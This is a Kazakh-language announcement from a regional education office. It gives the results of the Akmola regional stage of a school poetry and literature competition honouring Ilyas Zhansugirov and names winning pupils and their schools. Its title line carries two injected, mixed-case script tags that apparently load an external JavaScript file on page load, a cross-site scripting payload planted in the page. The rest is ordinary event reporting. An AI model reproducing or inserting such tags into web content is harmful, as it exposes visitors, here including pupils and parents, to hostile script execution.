Республикалық Ілияс Жансүгіров оқулары облыстық кезеңінің қорытындысы бойынша ақпарат<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

03.04.2023

 

              Ақмола облысы білім басқармасының «Ақмола дарыны» дарынды балалар мен талантты жастарды анықтау және қолдау орталығының ұйымдастыруымен

              2023 жылғы 30-31 наурыз күндері аралығында  8-11 сынып оқушылары арасында 

              Республикалық Ілияс Жансүгіров  оқуларының онлайн облыстық кезеңі өткізілді.

       Мақсаттары мен міндеттері:

-Ілияс Жансүгіров шығармаларын насихаттау;

-шығармашыларық қабілеттерін, эстетикалық талғамдарын, тума талант, табиғи дарындарын анықтау;

- оқушылардың поэзияға деген құштарлығын арттыру. Өлең сөзінің құдіретін жанымен сезіну, жүрегімен түсіне білуге баулу. Ілиястың лирикалық, эпикалық, прозалық, драмалық шығармаларымен және фольклорлық, ғылыми-публицистикалық зерттеулерімен танысып, ол туралы өз ой-пікірлерін ғылыми тұрғыда жеткізе білуге дағдыландыру;

- жас ақындарға әлеуметтік-рухани қолдау көрсетіп, шығармашылық жұмыс түрлерін жандандыру. Жас буынның тарихи танымдарын, демократияға және азаматтыққа бағдарланған дүнитанмдары мен сана-сезімдерін, өмірлік айқындамаларын қалыптастыру.

Байқау 3 бағыт бойынша өткізілді:

I бағыт – «Ілияс-қазақ поэзиясының жыр құлагері»;

II бағыт – «Ұлы тұлғаға арнау»;

III бағыт – «Ілияс-сөз шебері».

Байқауға Ақмола облысының жалпы білім беретін ұйымдарының 36 оқушысы қатысты.  

Ілияс Жансүгіров  оқуларының қорытындысы бойынша I орын алған оқушылар:

         1. «Ілияс-қазақ поэзиясының жыр құлагері» бағыты бойынша Ибрашева Жасмина - Ақмола облысы білім басқармасының Жақсы ауданы бойынша білім бөлімі Жаңа Қима ауылының Ғ. Әбдірахманов атындағы жалпы орта білім беретін мектебінің 11-сынып оқушысы;

        2. «Ұлы тұлғаға арнау» бағыты бойынша Дуйсембаев Айтуар - Ақмола облыс білім басқармасының Бурабай ауданы бойынша білім бөлімі

                Щучинск қаласының № 9 мектеп-гимназиясының 10-сынып оқушысы;

              3. «Ілияс-сөз шебері» бағыты бойынша Ергельдинова Зейнеп - Ақмола облысы білім басқармасының Астана қаласы, №2 "Дарын" облыстық

                мамандандырылған мектеп-лицей-интернатының 9-сынып оқушысы.

               Ілияс Жансүгіров  оқуларының қорытындысы бойынша II орынмен келесі оқушылар марапатталды:

«Ілияс-қазақ поэзиясының жыр құлагері» бағыты бойынша:

  1. Манап Ақнұр - Ақмола облысы білім басқармасының Біржан сал ауданы бойынша білім бөлімі Қоғам ауылының Ш.Қосшығұлов атындағы жалпы орта білім беретін мектебінің 10-сынып оқушысы;
  2. Ерболат Жасұлан - Ақмола облысы білім басқармасының Степногорск қаласы бойынша білім бөлімі Қырық құдық ауылының жалпы орта білім беретін мектебінің 8-сынып оқушысы.

               «Ұлы тұлғаға арнау» бағыты бойынша:

               1. Мұғаз Ризаби - Ақмола облысы білім басқармасының Ақкөл ауданы бойынша білім бөлімі  Кеңес ауылының жалпы орта білім беретін мектебінің 9-сынып оқушысы;

               2. Хуанған Харлығаш - Ақмола облыс білім басқармасының Бұланды ауданы бойынша білім бөлімі Макинск қаласының Балуан Шолақ атындағы

               мектеп-лицейінің 11-сынып оқушысы.

               «Ілияс-сөз шебері» бағыты бойынша:

                1.Мұсылманбек Гүлхан - Ақмола облысы, Степногорск қаласы, № 4 "Болашақ" облыстық мамандандырылған мектеп-лицей-интернатының 9-сынып оқушысы.

                 Ілияс Жансүгіров  қорытындысы бойынша III орынмен келесі оқушылар марапатталды.

                 «Ілияс-қазақ поэзиясының жыр құлагері» бағыты бойынша:

                 1. Совет Аружан - Ақмола облысы білім басқармасының Жарқайың ауданы бойынша білім бөлімі Кең ауылының негізгі орта мектебінің 8-сынып оқушысы;

                  2. Рахметова Аққу - Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының әл-Фараби атындағы IT лицейінің 9-сынып оқушысы;

                  3. Айткожина Адина - Ақмола облысы білім басқармасының Көкшетау қаласы бойынша білім бөлімі Көкшетау қаласының № 19 жалпы орта

                  білім беретін мектебінің 8-сынып оқушысы.

                  «Ұлы тұлғаға арнау» бағыты бойынша:

                   1. Әлиасқар Тілеуді - Ақмола облысы білім басқармасының Жарқайың ауданы бойынша білім бөлімі Державин қаласының А.Үкібаев атындағы

                   жалпы орта білім беретін мектебінің 8-сынып оқушысы;

                    2. Қақан Перизат - Ақмола облысы білім басқармасының Целиноград ауданы бойынша білім бөлімі Қоянды ауылының № 1 жалпы орта білім беретін мектебінің

                   8-сынып оқушысы;

                    3. Дәулетқызы Баян - Ақмола облысы білім басқармасының Астана қаласы, №2 "Дарын" облыстық мамандандырылған мектеп-лицей-интернатының 9-сынып оқушысы.

                    «Ілияс-сөз шебері» бағыты бойынша:

                    1.Кайруллина Арайлым - Ақмола облысы білім басқармасының Біржан сал ауданы бойынша білім бөлімі Мамай ауылының негізгі орта білім беретін

                     мектебінің 9-сынып оқушысы.

                        Ілияс Жансүгіров  оқуларының қорытындысы бойынша грамотамен марапатталған оқушысы:

                         «Ілияс-қазақ поэзиясының жыр құлагері» бағыты бойынша  Ілияс Ақерке - Ақмола облысы білім басқармасының Ақкөл ауданы бойынша білім бөлімі  

                        Қына  ауылының  жалпы орта білім беретін мектебінің 8-сынып оқушысы.

                        Ілияс Жансүгіров  оқуларының облыстық кезеңінде I орын алған жүлдегерлер республикалық кезеңге жолдама алды. Жеңімпаздарға сәттілік тілейміз!!!

Просмотров: 242


Пікір қосу



Деректерді қолтаңбаға қосу